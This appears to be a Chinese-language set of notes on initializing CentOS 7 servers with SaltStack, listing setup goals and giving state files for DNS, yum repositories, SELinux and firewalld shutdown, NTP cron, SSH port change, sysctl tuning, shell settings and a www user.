需求分析
一,系统初始化
1.1 关闭SELinux
1.2 关闭默认iptables
1.3 时间同步(配置NTP)
1.4 文件描述符(必备/etc/security/limmits.conf)
1.5 内核优化(必备 tcp 内存 io)
1.6 SSH服务优化(关闭DNS解析,修改端口)
1.7 精简开机系统服务(只开启SSHD服务)
1.8 DNS解析(必备)
1.9 字符集
1.10 hosts文件统一
1.11 历史记录优化histroy(记录时间,用户)
1.12 设置终端超时时间(安全考虑)
1.13 配置yum源(必备)
1.14 安装各种agent(zabbix lostash)
1.15 基础用户,用户审计,sudo权限设置(必备)
1.16 常用基础命令,命令别名(screen lrzsz tree openssl telnet iftop iotop sysstat wget ntpdate dos2unix lsof net-tools mtr)
1.17 用户登录提示,包括PS1的修改
1.18 tcpwrapper修改
cron模块 分时日月周 写了代表该位置是什么不写默认为*
cron-ntpdate:
cron.present:
- name: ntpdate cn.pool.ntp.org
- user: root
- minute: '*/5'
目录结构
其中文件
epel-7.repo为下载的yum源
limits.conf为优化后的文件
resolv.conf是DNS配置文件
selinux-config为关闭selinux的文件
sshd_config修改了默认的端口22为8022并且不允许DNS解析
dns.sls
/etc/resolv.conf:
file.managed:
- source: salt://init/files/resolv.conf
- user: root
- gourp: root
- mode: 644
firewalld.sls
firewalld-stop:
service.dead:
- name: firewalld.service
- enable: False
init/history.sls
histroy-init:
file.append:
- name: /etc/profile
- text:
- export HISTTIMEFORMAT="%F %T `whoami` "
init/limmit.sls
limmits-config:
file.managed:
- name: /etc/security/limits.conf
- source: salt://init/files/limits.conf
- user: root
- group: root
- mode: 644
init/ntp-client.sls
install-ntpdate:
pkg.installed:
- name: ntpdate
cron-ntpdate:
cron.present:
- name: ntpdate cn.pool.ntp.org
- user: root
- minute: '*/5'
init/pkg-base.sls
include:
- init.yum-repo
base-install:
pkg.installed:
- pkgs:
- screen
- lrzsz
- tree
- openssl
- telnet
- iftop
- iotop
- sysstat
- wget
- dos2unix
- lsof
- net-tools
- mtr
- unzip
- zip
- vim-enhanced
- bind-utils
- require:
- file: /etc/yum.repos.d/epel-7.repo
init/selinux.sls
close_selinux:
file.managed:
- name: /etc/selinux/config
- source: salt://init/files/selinux-config
- user: root
- group: root
- mode: 0644
cmd.run:
- name: setenforce 0 || echo ok
init/ssh.sls
sshd-config:
file.managed:
- name: /etc/ssh/sshd_config
- source: salt://init/files/sshd_config
- user: root
- group: root
- mode: 600
service.running:
- name: sshd
- enable: True
- reload: True
- watch:
- file: sshd-config
init/sysctl.sls
#建议在这里加注释
net.ipv4.tcp_fin_timeout:
sysctl.present:
- value: 2
net.ipv4.tcp_tw_reuse:
sysctl.present:
- value: 1
init/thin.sls
postfix:
service.dead:
- enable: False
init/tty-style.sls
/etc/bashrc:
file.append:
- text:
- export PS1=' [u@h w]$ '
init/tty-timeout.sls
tty-timeout:
file.append:
- name: /etc/profile
- text:
- export TMOUT=300
init/user-www.sls
www-user-group:
group.present:
- name: www
- gid: 1000
user.present:
- name: www
- fullname: www
- shell: /sbin/bash
- uid: 1000
- gid: 1000
init/yum-repo.sls
/etc/yum.repos.d/epel-7.repo:
file.managed:
- source: salt://init/files/epel-7.repo
- user: root
- group: root
- mode: 644
init-all.sls
include: - init.dns - init.yum-repo - init.firewalld - init.history - init.limmit - init.ntp-client - init.pkg-base - init.selinux - init.ssh - init.sysctl - init.thin - init.tty-timeout - init.tty-style - init.user-www
执行即可初始化
salt 'linux-node2.example.com' state.sls init-all